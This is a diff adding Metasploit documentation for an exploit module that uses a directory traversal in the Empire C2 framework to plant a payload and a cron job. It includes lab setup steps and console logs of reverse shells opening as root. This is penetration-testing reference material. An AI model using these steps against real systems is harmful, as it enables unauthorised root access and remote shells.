zeroSteiner
diff --git a/‎documentation/modules/exploit/linux/http/empire_skywalker.md
Lines changed: 327 additions & 0 deletions b/‎documentation/modules/exploit/linux/http/empire_skywalker.md
Lines changed: 327 additions & 0 deletions
@@ -0,0 +1,327 @@
+## Vulnerable Application
+This module exploits a directory traversal vulnerability in both
+BC-SECURITY/Empire C2 Framework (<5.9.3) and ProjectEmpire/Empire (<f030cf62) and
+writes the payload to /tmp/ directory followed by a cron.d file to execute the payload.
+
+The vulnerability affects:
+
+    * BC-SECURITY/Empire C2 Framework (<5.9.3)
+    * ProjectEmpire/Empire (<f030cf62)
+
+This module was successfully tested on:
+
+    * BC-SECURITY/Empire C2 Framework (v5.9.2) on Kali Linux 6.6.15
+    * BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15
+    * ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15
+
+
+### Install and run the vulnerable Empire
+#### BC-SECURITY/Empire
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Empire docker container (<5.9.3) in your VM.
+   `docker pull bcsecurity/empire:v5.9.2`
+4. Run the server and the client on the same VM.
+5. Run the server.
+
+`docker run -it --net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d bcsecurity/empire:v5.9.2`
+(`--net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d` is not realistic but for simplicity
+ and payload will be loaded in host not in container) or
+```
+docker run -it --net="host" bcsecurity/empire:v5.9.2
+docker exec -it <server container id> bash
+apt update
+apt install cron
+cron
+```
+\(Payload will be loaded in container but you have to manually set up cron on container.)
+
+6. Run the client.
+`docker run -it --net="host" bcsecurity/empire:v5.9.2 client`
+7. Execute Empire listener on client.
+```bash
+uselistener http
+set Host <rhost>
+set Port <port>
+execute
+```
+
+#### ProjectEmpire/Empire
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Clone empire.
+`git clone https://github.com/EmpireProject/Empire.git`
+4. `cd Empire`
+5. `git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110`
+6. `docker pull empireproject/empire`
+7. `docker run -it --net="host" -v $(pwd):/opt/Empire -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d empireproject/empire /bin/bash`
+
+(Payload will be loaded in host not in container.) or
+```
+docker run -it --net="host" empireproject/empire /bin/bash
+cron
+```
+(Payload will be loaded in container but you have to manually set up cron on container.)
+
+8. `cd setup`
+9. `./reset.sh` (Empire start)
+10. Execute listener.
+```bash
+listeners
+set Host <rhost>
+set Port <port>
+run
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/empire_skywalker`
+4. Do: `set rhost <rhost>`
+5. Do: `set rport <port>`
+6. Do: `set lhost <attacker-ip>`
+7. Optional: `set CVE <cve>`
+8. Do: `run`
+9. Have the generated request processed by a vulnerable version of Empire
+10. You should get a shell or meterpreter
+
+
+## Options
+
+###  TARGETURI (optional)
+
+This is the Base URI path. This is used when CVE is set to `Original`. Default is `/`.
+
+### STAGE0_URI (required)
+
+This is the URI path requested by the initial launcher. This is used when CVE is set to `Original`. Default is `index.asp`.
+
+### STAGE1_URI (required)
+
+This is the URI path used by the RSA key post. This is used when CVE is set to `Original`. Default is `index.jsp`
+
+### PROFILE (optional)
+
+This is Empire agent traffic profile URI. This is used when CVE is set to `Original`.
+
+### CVE (required)
+
+This is the vulnerability to use. Default is `CVE-2024-6127`, but `Original` can also be chosen.
+
+### STAGE_PATH (required)
+
+This is the Empire's default staging path. This is used when CVE is set to `CVE-2024-6127`. Default is `login/process.php`.
+([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))
+
+### PROFILE (required)
+
+This is the Empire's default communication profile agent.  This is used when CVE is set to `CVE-2024-6127`.
+Default is `Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko`
+([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))
+
+
+## Scenarios
+### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
+rhost => 192.168.56.7
+msf6 exploit(linux/http/empire_skywalker) > set rport 80
+rport => 80
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.7:80 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/NYLkIKRK
+[*] Writing cron job to /etc/cron.d/AeVTTPiZ
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (24772 bytes) to 192.168.56.7
+[+] Deleted /etc/cron.d/AeVTTPiZ
+[+] Deleted /tmp/NYLkIKRK
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
+[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target
+
+meterpreter > sysinfo
+Computer        : kali
+OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+```
+
+### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set target 1
+target => 1
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/jJzYkeKV
+[*] Writing cron job to /etc/cron.d/nFnFIbim
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (36 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/nFnFIbim
+[+] Deleted /tmp/jJzYkeKV
+[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
+[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900
+
+whoami
+root
+```
+
+### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set target 2
+target => 2
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
+payload => linux/x64/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/qxlOSIYF
+[*] Writing cron job to /etc/cron.d/ugrYIJzf
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (38 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/ugrYIJzf
+[+] Deleted /tmp/qxlOSIYF
+[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
+[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900
+
+whoami
+root
+```
+
+### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 0, port 8080)
+```
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set CVE Original 
+CVE => Original
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/PSDaqPOJ
+[*] Writing cron job to /etc/cron.d/KQlwBZQk
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (24772 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/KQlwBZQk
+[+] Deleted /tmp/PSDaqPOJ
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:38552) at 2024-07-24 18:01:04 +0900
+[!] This exploit may require manual cleanup of '/agent.log' on the target
+
+meterpreter > sysinfo
+Computer        : kali
+OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
+
+### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set CVE Original
+CVE => Original
+msf6 exploit(linux/http/empire_skywalker) > set target 1
+target => 1
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/VzTAquhE
+[*] Writing cron job to /etc/cron.d/LjvThMOu
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (36 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/LjvThMOu
+[+] Deleted /tmp/VzTAquhE
+[!] Tried to delete /agent.log, unknown result
+[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:47140) at 2024-07-24 18:06:08 +0900
+
+whoami
+root
+```
+
+### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set cve Original
+cve => Original
+msf6 exploit(linux/http/empire_skywalker) > set target 2
+target => 2
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
+payload => linux/x64/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/uuTqlfDp
+[*] Writing cron job to /etc/cron.d/frDtYnmD
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (38 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/frDtYnmD
+[+] Deleted /tmp/uuTqlfDp
+[!] Tried to delete /agent.log, unknown result
+[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:51566) at 2024-07-24 18:08:08 +0900
+
+whoami
+root
+```